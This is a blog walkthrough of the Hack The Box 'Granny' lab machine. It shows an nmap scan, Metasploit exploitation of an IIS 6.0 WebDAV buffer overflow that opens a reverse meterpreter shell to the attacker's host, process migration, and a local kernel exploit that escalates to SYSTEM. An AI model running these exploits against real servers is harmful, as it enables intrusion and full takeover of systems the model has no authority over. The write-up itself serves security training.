DEV Community

ikkyu
ikkyu

Posted on • Updated on

【Hack the Box】Granny - Walkthrough

From the HacktheBox

twitter:@ikk_hck

Enumeration

Anyway, nmap.

$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
Enter fullscreen mode Exit fullscreen mode

Here are the results.

# Nmap 7.91 scan initiated Sat May  8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
Enter fullscreen mode Exit fullscreen mode

You can see that Microsoft IIS httpd 6.0 is working.
I'll look for it in Metasploit.

$ msfconsole   

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |                                                     
  |                 o         |       .'  LOOT  '.        |                                                     
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                                     
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                                     
  | |________________|__|)__| |    |     __||_)     |     |                                                     
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                                     
  |  = = = = = = = = = = = =  |     '--------------'      |                                                     
  +---------------------------+---------------------------+                                                     


       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 > search iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl   
Enter fullscreen mode Exit fullscreen mode

Exploit

I found it, set the ip address, etc. and ran it.

msf6 > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):                                           

   Name           Current Setting  Required  Description                                                        
   ----           ---------------  --------  -----------                                                        
   MAXPATHLENGTH  60               yes       End of physical path brute force                                   
   MINPATHLENGTH  3                yes       Start of physical path brute force                                 
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]       
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syn  
                                             tax 'file:<path>'                                                  
   RPORT          80               yes       The target port (TCP)                                              
   SSL            false            no        Negotiate SSL/TLS for outgoing connections                         
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700             

meterpreter >                                      
Enter fullscreen mode Exit fullscreen mode

The intrusion was successful.

PE

meterpreter > getuid                                                                                            
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.    
Enter fullscreen mode Exit fullscreen mode

I try to check permissions, but I can't seem to even do that.
Let's check the process.

meterpreter > ps                                                                                                

Process List                                                                                                    
============                                                                                                    

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 596   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 784   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1412  396   vmtoolsd.exe
 1464  396   svchost.exe
 1628  396   svchost.exe
 1732  396   dllhost.exe
 1816  396   alg.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse
                                                                             .exe
 1900  396   dllhost.exe
 2120  396   vssvc.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.
                                                                             exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcd
                                                                             ata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe
Enter fullscreen mode Exit fullscreen mode

What's my process?

meterpreter > getpid
Current pid: 2308
Enter fullscreen mode Exit fullscreen mode
meterpreter > getpid
Current pid: 2308
Enter fullscreen mode Exit fullscreen mode

I see, it will move to one of the processes whose username is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
Enter fullscreen mode Exit fullscreen mode

Then you check the user again, you will see that it is "NT AUTHORITY\NETWORK SERVICE".

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Enter fullscreen mode Exit fullscreen mode

Return to the local terminal once to find a code that can be used for PE.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
Enter fullscreen mode Exit fullscreen mode

I try to use "ms14_058_track_popup_menu", but it doesn't work.
Next, try to use "ms14_070_tcpip_ioctl".

msf6 exploit(windows/local/ms14_058_track_popup_menu) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -> 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Enter fullscreen mode Exit fullscreen mode

It seems to have succeeded, so I went ahead and checked the permissions and found that they are "NT AUTHORITY\SYSTEM".
Then, follow the steps below to explore and get the flag.

meterpreter > cd /
meterpreter > ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS
100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings
40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS
100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM
40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files
40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information
40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS
100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini
100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr
0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys
40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpub

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkService

meterpreter > cd Administrator 
meterpreter > ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
---------              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.ini

meterpreter > cd Desktop 
lmeterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
---------              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt
Enter fullscreen mode Exit fullscreen mode

incidentally

If you try to PE without changing it from the original process, you will get the following.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
Enter fullscreen mode Exit fullscreen mode

Good night.

Discussion (0)